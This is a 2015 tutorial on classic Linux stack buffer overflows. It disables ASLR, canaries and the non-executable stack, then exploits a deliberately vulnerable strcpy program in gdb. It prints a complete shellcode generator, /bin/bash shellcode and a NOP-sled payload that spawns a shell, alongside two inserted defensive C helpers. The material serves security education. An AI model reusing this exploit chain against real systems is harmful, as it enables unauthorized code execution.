Basic stack overflow attacks on Linux
 
Author: elite   Source: 51Testing   Published 2015-01-06
 

Linux stack overflow protection mechanisms

The basic stack overflow is the earliest form of buffer overflow attack and the foundation of all the others. Because it has been known for so long, the GCC compiler and the Linux operating system provide several mechanisms to stop it from harming the system. Below we first look at the existing mechanisms that protect the stack and at how to turn each of them off, which gives us a clean experimental environment for analysing the basic stack overflow.

1. Memory address randomization

Ubuntu and other systems based on the Linux kernel now initialise the stack at a randomized memory address, which makes guessing a specific address very difficult.

To turn off memory address randomization:

sysctl -w kernel.randomize_va_space=0

2. Exec-shield protection for executable programs

On Fedora systems, exec-shield protection for executables is enabled by default. It forbids executing code stored on the stack, which makes the buffer overflow attack ineffective. Ubuntu does not enable this mechanism by default.

To turn off exec-shield protection for executables:

sysctl -w kernel.exec-shield=0

3. The gcc compiler's gs canary check

This is a protection gcc adds specifically against buffer overflows. Before the buffer is written, gcc places a random canary value (taken from the gs segment) just after the end of buf and just before the return address, and it checks that value when the function finishes writing the buffer. A buffer overflow normally overwrites memory from low addresses towards high addresses, so to overwrite the return address it must also overwrite the canary. Comparing the canary before and after the write therefore tells whether an overflow occurred.

To turn off the gcc canary check:

Compile with the -fno-stack-protector option.

4. The ld linker's non-executable stack segment

When ld links a program, the stack segment of the whole result is marked non-executable only if the stack segments of all the .o files are marked non-executable; conversely, if even a single .o file has its stack segment marked executable, the stack segment of the whole result is marked executable. To check whether the stack segment is executable:

For an ELF binary or library: readelf -lW $BIN | grep GNU_STACK and look for the E flag

For a generated .o file: scanelf -e $BIN and look for the X flag

If ld marks the stack segment non-executable, then even after eip has been taken over and the jump happens, the result is still a segmentation fault.

To turn off the ld linker's non-executable stack:

Compile with the -z execstack option.
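As an added example (not part of the original article), the following C program performs the PT_GNU_STACK check described above on its own, without readelf or scanelf: it walks the program header table of an ELF32 or ELF64 image and reports whether the stack segment carries the executable flag, the RWE versus RW that readelf prints. The file argument, the state names and the build_image helper, which constructs throw-away header bytes so the parser can be exercised offline, are this example's own; a binary built with -z execstack as in the experiment below is expected to report an executable stack, and a binary with no PT_GNU_STACK header at all is reported separately because the kernel's architecture default then decides.

```c
/* Added example: report the stack permission recorded in an ELF image's
 * PT_GNU_STACK program header. Field offsets follow the ELF32/ELF64 layouts. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define PT_GNU_STACK 0x6474e551u   /* program-header type carrying the stack permissions */
#define PF_X 0x1u
#define PF_W 0x2u
#define PF_R 0x4u

enum stack_state { STACK_BAD_ELF = -1, STACK_NX = 0, STACK_EXEC = 1, STACK_UNSPECIFIED = 2 };

/* Read a width-byte integer at byte offset off, honouring the image's byte order. */
static uint64_t rd(const unsigned char *p, size_t off, int width, int big_endian)
{
    uint64_t v = 0;
    for (int i = 0; i < width; i++) {
        int idx = big_endian ? i : width - 1 - i;   /* most significant byte first */
        v = (v << 8) | p[off + idx];
    }
    return v;
}

/* Returns STACK_EXEC / STACK_NX from PT_GNU_STACK, STACK_UNSPECIFIED when the header
 * is absent, STACK_BAD_ELF when the bytes are not a parsable ELF image. */
int gnu_stack_state(const unsigned char *img, size_t len)
{
    if (len < 16 || memcmp(img, "\x7f" "ELF", 4) != 0) return STACK_BAD_ELF;
    if (img[4] != 1 && img[4] != 2) return STACK_BAD_ELF;     /* EI_CLASS */
    int is64 = img[4] == 2, be = img[5] == 2;                   /* EI_DATA: 2 = big endian */
    if (len < (is64 ? 64u : 52u)) return STACK_BAD_ELF;
    /* e_phoff, e_phentsize and e_phnum sit at different offsets in the two classes */
    uint64_t phoff = is64 ? rd(img, 32, 8, be) : rd(img, 28, 4, be);
    unsigned phentsize = (unsigned)rd(img, is64 ? 54 : 42, 2, be);
    unsigned phnum = (unsigned)rd(img, is64 ? 56 : 44, 2, be);
    size_t flags_off = is64 ? 4 : 24;        /* p_flags position inside one program header */
    for (unsigned i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (off + flags_off + 4 > len) return STACK_BAD_ELF;   /* truncated table */
        if (rd(img, (size_t)off, 4, be) == PT_GNU_STACK)
            return (rd(img, (size_t)off + flags_off, 4, be) & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_UNSPECIFIED;   /* no PT_GNU_STACK: the kernel's per-architecture default applies */
}

/* Write a width-byte integer at byte offset off in the requested byte order. */
static void wr(unsigned char *p, size_t off, uint64_t v, int width, int big_endian)
{
    for (int i = 0; i < width; i++) {
        int idx = big_endian ? width - 1 - i : i;   /* least significant byte goes last/first */
        p[off + idx] = (unsigned char)(v & 0xff);
        v >>= 8;
    }
}

/* Constructed test image (this example's own): an ELF header plus, when flags >= 0,
 * a single PT_GNU_STACK entry. Not loadable; just enough structure for the parser.
 * out must hold at least 120 bytes. Returns the image length. */
size_t build_image(unsigned char *out, int is64, int big_endian, int flags)
{
    size_t ehsize = is64 ? 64 : 52, phentsize = is64 ? 56 : 32;
    int phnum = flags < 0 ? 0 : 1;
    memset(out, 0, ehsize + phentsize);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = is64 ? 2 : 1;            /* EI_CLASS */
    out[5] = big_endian ? 2 : 1;      /* EI_DATA */
    out[6] = 1;                       /* EI_VERSION */
    if (is64) { wr(out, 32, ehsize, 8, big_endian); wr(out, 54, phentsize, 2, big_endian); wr(out, 56, (uint64_t)phnum, 2, big_endian); }
    else      { wr(out, 28, ehsize, 4, big_endian); wr(out, 42, phentsize, 2, big_endian); wr(out, 44, (uint64_t)phnum, 2, big_endian); }
    if (phnum) {
        wr(out, ehsize, PT_GNU_STACK, 4, big_endian);                       /* p_type */
        wr(out, ehsize + (is64 ? 4 : 24), (uint64_t)flags, 4, big_endian);  /* p_flags */
    }
    return ehsize + (size_t)phnum * phentsize;
}

/* Usage: ./gnu_stack <elf-file>; exit status 1 flags an executable stack, 2 a parse error. */
int main(int argc, char **argv)
{
    static const char *names[] = { "RW (non-executable stack)", "RWE (executable stack)",
                                   "no PT_GNU_STACK header (kernel default applies)" };
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 2; }
    fseek(f, 0, SEEK_END); long n = ftell(f); rewind(f);
    unsigned char *img = malloc(n > 0 ? (size_t)n : 1);
    size_t got = img ? fread(img, 1, (size_t)n, f) : 0;
    fclose(f);
    int st = gnu_stack_state(img, got);
    free(img);
    if (st < 0) { fprintf(stderr, "%s: not a parsable ELF image\n", argv[1]); return 2; }
    printf("%s: GNU_STACK %s\n", argv[1], names[st]);
    return st == STACK_EXEC ? 1 : 0;
}
```

Because the exit status is non-zero for an executable stack, the program can sit in a build pipeline as a guard that fails when an object linked with -z execstack, or an assembly file without a .note.GNU-stack section, has silently made the final binary's stack executable.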

Principle and experiment of the basic stack overflow attack

Below, a worked stack overflow example is used to explain the steps of the basic stack overflow attack in detail.

Before the experiment, use the methods explained above to turn off the relevant stack protections.

root@linux:~/pentest# sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
root@linux:~/pentest# sysctl -w kernel.exec-shield=0
error: "kernel.exec-shield" is an unknown key

The code is as follows:

root@linux:~/pentest# cat vulnerable.c
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
    char buffer[500];
    strcpy(buffer, argv[1]);   /* unbounded copy of argv[1] into a 500-byte stack buffer */
    return 0;
}

Compile the source:

root@linux:~/pentest# gcc -fno-stack-protector -z execstack -g -o vulnerable vulnerable.c

Debug the program with gdb:

root@linux:~/pentest# gdb vulnerable
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /root/pentest/vulnerable...done.
(gdb) disass main
Dump of assembler code for function main:
0x080483c4 <+0>:   push   %ebp
0x080483c5 <+1>:   mov    %esp,%ebp
0x080483c7 <+3>:   and    $0xfffffff0,%esp
0x080483ca <+6>:   sub    $0x210,%esp
0x080483d0 <+12>:  mov    0xc(%ebp),%eax
0x080483d3 <+15>:  add    $0x4,%eax
0x080483d6 <+18>:  mov    (%eax),%eax
0x080483d8 <+20>:  mov    %eax,0x4(%esp)
0x080483dc <+24>:  lea    0x1c(%esp),%eax
0x080483e0 <+28>:  mov    %eax,(%esp)
0x080483e3 <+31>:  call   0x80482f4 <strcpy@plt>
0x080483e8 <+36>:  mov    $0x0,%eax
0x080483ed <+41>:  leave
0x080483ee <+42>:  ret
End of assembler dump.
(gdb)

At this point, before strcpy is called, the layout of main's stack frame is as shown in the figure below:

From this stack frame layout, to control the value of eip at least 508 bytes must be written into buffer[500].

Next we continue debugging in gdb:

(gdb) b *main+41
Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
(gdb) r `perl -e 'print "\x41"x508'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`
Breakpoint 1, main (argc=2, argv=0xbffff264) at vulnerable.c:11
11  }
(gdb) c
Continuing.
Program exited normally.
(gdb)

With 508 characters written into buffer, the program finishes normally and exits. This means the stack did not overflow: too little data was written. Yet by the analysis above, 508 characters should in theory be enough. Where is the problem? Re-reading the source and the disassembly, it is not hard to see that the cause is the instruction "0x080483c7 <+3>: and $0xfffffff0,%esp". Below we continue in gdb to analyse how this instruction affects our overflow.

(gdb) disass main
Dump of assembler code for function main:
0x080483c4 <+0>:   push   %ebp
0x080483c5 <+1>:   mov    %esp,%ebp
0x080483c7 <+3>:   and    $0xfffffff0,%esp
0x080483ca <+6>:   sub    $0x210,%esp
0x080483d0 <+12>:  mov    0xc(%ebp),%eax
0x080483d3 <+15>:  add    $0x4,%eax
0x080483d6 <+18>:  mov    (%eax),%eax
0x080483d8 <+20>:  mov    %eax,0x4(%esp)
0x080483dc <+24>:  lea    0x1c(%esp),%eax
0x080483e0 <+28>:  mov    %eax,(%esp)
0x080483e3 <+31>:  call   0x80482f4 <strcpy@plt>
0x080483e8 <+36>:  mov    $0x0,%eax
0x080483ed <+41>:  leave
0x080483ee <+42>:  ret
End of assembler dump.
(gdb) b *main+3
Breakpoint 2 at 0x80483c7: file vulnerable.c, line 4.
(gdb) b *main+6
Breakpoint 3 at 0x80483ca: file vulnerable.c, line 4.
(gdb) r `perl -e 'print "\x41"x508'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`
Breakpoint 2, 0x080483c7 in main (argc=2, argv=0xbffff264) at vulnerable.c:4
4   int main(int argc, char **argv) {
(gdb) i r esp
esp            0xbffff1b8   0xbffff1b8
(gdb) c
Continuing.
Breakpoint 3, 0x080483ca in main (argc=2, argv=0xbffff264) at vulnerable.c:4
4   int main(int argc, char **argv) {
(gdb) i r esp
esp            0xbffff1b0   0xbffff1b0
(gdb)

The debugging session shows that before the instruction "0x080483c7 <+3>: and $0xfffffff0,%esp" executes, esp is 0xbffff1b8, and after it executes, esp is 0xbffff1b0. So esp has decreased by 8, which means that to control eip another 8 bytes must be written, i.e. 516 characters are needed to fill buffer.
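To make this arithmetic concrete, the following C program (an added example, not from the article) replays main's prologue using the three constants in the disassembly, and $0xfffffff0, sub $0x210 and lea 0x1c(%esp), starting from the esp value the session prints at main+3. It computes where buffer, the saved ebp and the return address sit in the frame, and how many bytes of the strcpy overrun reach the return address: 512 bytes to reach it and 516 to replace all four bytes of it. Feeding it an esp that is already 16-byte aligned gives the 508-byte case, so the 8 bytes the author attributes to the and instruction are exactly the alignment padding it inserts. The struct and function names are this example's own; the esp values are the ones printed in the sessions on this page.

```c
/* Added example: replay main's prologue arithmetic from the disassembly above. */
#include <stdio.h>
#include <stdint.h>

/* Constants taken from the disassembly of main in the article. */
#define ALIGN_MASK 0xfffffff0u   /* and  $0xfffffff0,%esp */
#define FRAME_SIZE 0x210u        /* sub  $0x210,%esp       */
#define BUF_OFFSET 0x1cu         /* lea  0x1c(%esp),%eax   */

struct frame {
    uint32_t ebp;            /* %ebp after "mov %esp,%ebp" */
    uint32_t buffer;         /* address of buffer[0], first argument to strcpy */
    uint32_t saved_ebp;      /* where the caller's ebp was pushed */
    uint32_t ret_addr;       /* where the return address lives */
    uint32_t dist_to_ret;    /* bytes from buffer[0] to the return address */
    uint32_t overwrite_len;  /* bytes an overrun needs to replace all 4 bytes of it */
};

/* esp_after_push is %esp right after "push %ebp", i.e. the value gdb shows at main+3. */
struct frame layout(uint32_t esp_after_push)
{
    struct frame f;
    f.ebp = esp_after_push;                 /* mov %esp,%ebp */
    uint32_t esp = f.ebp & ALIGN_MASK;      /* and $0xfffffff0,%esp: drops 0..15 bytes */
    esp -= FRAME_SIZE;                      /* sub $0x210,%esp */
    f.buffer = esp + BUF_OFFSET;            /* lea 0x1c(%esp),%eax */
    f.saved_ebp = f.ebp;                    /* pushed ebp sits at [ebp] */
    f.ret_addr = f.ebp + 4;                 /* return address sits at [ebp+4] */
    f.dist_to_ret = f.ret_addr - f.buffer;
    f.overwrite_len = f.dist_to_ret + 4;
    return f;
}

/* Bytes of alignment padding the "and" inserts between the frame and the saved ebp. */
uint32_t alignment_padding(uint32_t esp_after_push)
{
    return esp_after_push - (esp_after_push & ALIGN_MASK);
}

int main(void)
{
    /* 0xbffff1b8 is the esp the session prints at main+3 in the 508-byte run. */
    struct frame f = layout(0xbffff1b8u);
    printf("buffer=0x%08x saved_ebp=0x%08x ret=0x%08x\n", f.buffer, f.saved_ebp, f.ret_addr);
    printf("alignment padding: %u bytes\n", alignment_padding(0xbffff1b8u));
    printf("buffer -> return address: %u bytes; full overwrite: %u bytes\n",
           f.dist_to_ret, f.overwrite_len);
    /* Had esp already been 16-byte aligned, the same frame would need only 508 bytes. */
    struct frame g = layout(0xbffff1b0u);
    printf("with an already aligned esp: %u bytes\n", g.overwrite_len);
    return 0;
}
```

The same function reproduces the later 516-byte session too: with the esp of 0xbffff1a8 gdb shows there, layout() places buffer at 0xbfffefac, which is where the 0x41 bytes start in the x/550bx dump, and the return address at 0xbffff1ac, which is exactly where esp points when ret pops 0x41414141.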

(gdb) r `perl -e 'print "\x41"x516'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x516'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

The overflow has succeeded!

Below we step through the overflow in gdb to watch it happen. The detailed analysis is omitted; anyone familiar with gdb will find this debugging output self-explanatory:

(gdb) b *main+41
Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
(gdb) r `perl -e 'print "\x41"x516'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x516'`
Breakpoint 1, main (argc=0, argv=0xbffff254) at vulnerable.c:11
11  }
(gdb) i r ebp
ebp            0xbffff1a8   0xbffff1a8
(gdb) i r esp
esp            0xbfffef90   0xbfffef90
(gdb) i r eip
eip            0x80483ed    0x80483ed <main+41>
(gdb) x/550bx $esp
0xbfffef90: 0xac 0xef 0xff 0xbf 0xf6 0xf3 0xff 0xbf
0xbfffef98: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfffefa0: 0xa4 0xf0 0xff 0xbf 0x08 0x00 0x00 0x00
0xbfffefa8: 0x3c 0xd5 0x12 0x00 0x41 0x41 0x41 0x41
0xbfffefb0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfffefb8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfffefc0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfffefc8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfffefd0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfffefd8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
......
0xbffff198: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff1a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff1a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff1b0: 0x00 0x00 0x00 0x00 0x54 0xf2
(gdb)
(gdb) stepi
0x080483ee in main (argc=0, argv=0xbffff254) at vulnerable.c:11
11  }
(gdb) i r ebp
ebp            0x41414141   0x41414141
(gdb) i r esp
esp            0xbffff1ac   0xbffff1ac
(gdb) i r eip
eip            0x80483ee    0x80483ee <main+42>
(gdb) x/10bx $esp
0xbffff1ac: 0x41 0x41 0x41 0x41 0x00 0x00 0x00 0x00
0xbffff1b4: 0x54 0xf2
(gdb) stepi
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141   0x41414141
(gdb)

Now that we have found where the return address that feeds eip is stored, we can overwrite it and control the program's execution flow.

Next, we need a piece of shellcode. How to write shellcode is left for the next section; in this section we use a shellcode generator program found online to produce it. The source of the shellcode generator is:

/*
[] Shellcode Generator null byte free. []
[] Author: certaindeath            []
[] Site: certaindeath.netii.net (at the moment under construction)   []
[] This program generates a shellcode which uses the stack to store the command (and its arguments).   []
[] Afterwords it executes the command with the system call "execve". []
[] The code is a bit knotty, so if you want to understand how it works,
 I've added an example of assembly at the end.   []
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/types.h>
#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command
void print_c(__u8*,int);
void push_shc(__u8*, char*, int*);
int main(int argc, char *argv[]){
    char cmd[255], *a;
    FILE *c;
    int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2;
    __u8 *shc,start[2]={0x31,0xc0}, end[16]=
    {0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80},
    struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0};
    if(argc<2){
        printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
               "|      Shellcode Generator      |\n"
               "|        by certaindeath        |\n"
               "|                               |\n"
               "|  Usage: ./generator      |\n"
               " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
        _exit(1);
    }
    a=(char *)malloc((9+strlen(argv[1]))*sizeof(char));
    //find the command path
    a[0]=0;
    strcat(a, "whereis ");
    strcat(a, argv[1]);
    c=popen(a, "r");
    while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c)));
    while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c)));
    cmd[--k]=0;
    if(k==0){
        printf("No executables found for the command \"%s\".\n", argv[1]);
        _exit(1);
    }
    if(strlen(cmd)>254){
        printf("The lenght of the command path can't be over 254 bye.\n");
        _exit(1);
    }
    for(i=2;i<argc;i++)
        if(strlen(argv[i])>254){
            printf("The lenght of each command argument can't be over 254 byte.\n");
            _exit(1);
        }
    //work out the final shellcode lenght
    b=(k%2);
    b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
    totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
    for(i=2; i<argc;i++){
        k=strlen(argv[i]);
        b=(k%2);
        b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
        totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
    }
    totl+=4*(argc-2);
    printf("Shellcode lenght: %i\n", totl);
    //build the shellcode
    shc=(__u8 *)malloc((totl+1)*sizeof(__u8));
    memcpy(shc, start, 2);
    if(SETRUID){
        memcpy(shc+shp, struid, 10);
        shp+=10;
    }
    if(argc>2)
        push_shc(shc, argv[argc-1], &shp);
    else
        push_shc(shc, cmd, &shp);
    memset(shc+(shp++), 0x89, 1);
    memset(shc+(shp++), 0xe6, 1);
    if(argc>2){
        for(i=argc-2;i>1;i--)
            push_shc(shc, argv[i], &shp);
        push_shc(shc, cmd, &shp);
    }
    memset(shc+(shp++), 0x50, 1);
    memset(shc+(shp++), 0x56, 1);
    if(argc>2){
        for(i=argc-2;i>1;i--){
            memset(shc+(shp++), 0x83, 1);
            memset(shc+(shp++), 0xee, 1);
            memset(shc+(shp++), strlen(argv[i])+1, 1);
            memset(shc+(shp++), 0x56, 1);
        }
        memset(shc+(shp++), 0x83, 1);
        memset(shc+(shp++), 0xee, 1);
        memset(shc+(shp++), strlen(cmd)+1, 1);
        memset(shc+(shp++), 0x56, 1);
    }
    memcpy(shc+shp, end, 16);
    print_c(shc,totl);
    return 0;
}
void print_c(__u8 *s,int l){
    int k;
    for(k=0;k<l;k++){
        printf("\\x%.2x", s[k]);
        if(((k+1)%8)==0) printf("\n");
    }
    printf("\n");
}
void push_shc(__u8 *out, char *str, int *sp){
    int i=strlen(str), k, b, b1, tmp=i;
    __u8 pushb_0[6]={0x83,0xec,0x01,0x88,0x04,0x24},pushb[6]={0x83,0xec,0x01,0xc6,0x04,0x24};
    memcpy(out+(*sp), pushb_0, 6);
    *sp+=6;
    for(k=0;k<((i-(i%4))/4);k++){
        memset(out+((*sp)++), 0x68, 1);
        tmp-=4;
        memcpy(out+(*sp), str+tmp, 4);
        *sp+=4;
    }
    b=(i%2);
    b1=(b==1) ? (((i-1)/2)%2) : ((i/2)%2);
    if(b1){
        memset(out+((*sp)++), 0x66, 1);
        memset(out+((*sp)++), 0x68, 1);
        tmp-=2;
        memcpy(out+(*sp), str+tmp, 2);
        *sp+=2;
    }
    if(b){
        memcpy(out+(*sp), pushb, 6);
        *sp+=6;
        memcpy(out+((*sp)++), str+(--tmp), 1);
    }
}
/*
Here is the assembly code of a shellcode which executes the command "ls -l /dev".
This is the method used by the shellcode generator.
.global _start
_start:
    xorl %eax, %eax        ;clear eax
    subl $1, %esp          ;"/dev" pushed into the stack with a null byte at the end
    movb %al, (%esp)
    push $0x7665642f
    movl %esp, %esi        ;esp(address of "/dev") is saved in esi
    subl $1, %esp          ;"-l" pushed into the stack with a null byte at the end
    movb %al, (%esp)
    pushw $0x6c2d
    subl $1, %esp          ;"/bin/ls" pushed into the stack with a null byte at the end
    movb %al, (%esp)
    push $0x736c2f6e
    pushw $0x6962
    subl $1, %esp
    movb $0x2f, (%esp)
    ;now the vector {"/bin/ls", "-l", "/dev", NULL} will be created into the stack
    push %eax              ;the NULL pointer pushed into the stack
    push %esi              ;the address of "/dev" pushed into the stack
    subl $3, %esi          ;the lenght of "-l"(with a null byte) is subtracted from the address of "/dev"
    push %esi              ;to find the address of "-l" and then push it into the stack
    subl $8, %esi          ;the same thing is done with the address of "/bin/ls"
    push %esi
    movb $11, %al          ;finally the system call execve("/bin/ls", {"/bin/ls", "-l", "/dev", NULL}, 0)
    movl %esi, %ebx        ;is executed
    movl %esp, %ecx
    xor %edx, %edx
    int $0x80
    movb $1, %al           ;_exit(0);
    xor %ebx, %ebx
    int $0x80
*/

It is used as follows:

root@linux:~/pentest# gcc -o shellcode_generator shellcode_generator.c
root@linux:~/pentest# ./shellcode_generator /bin/bash
Shellcode lenght: 45
\x31\xc0\x83\xec\x01\x88\x04\x24
\x68\x62\x61\x73\x68\x68\x62\x69
\x6e\x2f\x83\xec\x01\xc6\x04\x24
\x2f\x89\xe6\x50\x56\xb0\x0b\x89
\xf3\x89\xe1\x31\xd2\xcd\x80\xb0
\x01\x31\xdb\xcd\x80
root@linux:~/pentest#

Now we give one way of filling buffer so that the return address is overwritten (it is not the only one, just one that works):

"\x90" * 431  +  shellcode (45 bytes)  +  shellcode address (4 bytes) * 10  ==  516 B

Here "\x90" is the NOP instruction, so the shellcode address can be replaced by any address between the start of buffer and the start of the shellcode.

At this point we have constructed our overflow input, as follows:

(gdb) run `perl -e 'print
"\x90"x431,"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec
\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31
\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80","\xac\xef\xff\xbf"x10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/pentest/vulnerable `perl -e 'print
"\x90"x431,"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6
\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80",
"\xac\xef\xff\xbf"x10'`
process 3724 is executing new program: /bin/bash
root@linux:/root/pentest# exit
exit
Program exited normally.
(gdb)

As can be seen, our overflow input executed the shellcode and obtained the corresponding shell.

With that, the stack overflow attack has succeeded.

Note: because of the %gs canary, when the %gs check is enabled the scheme above can only complete the stack overflow under the gdb debugging environment.

   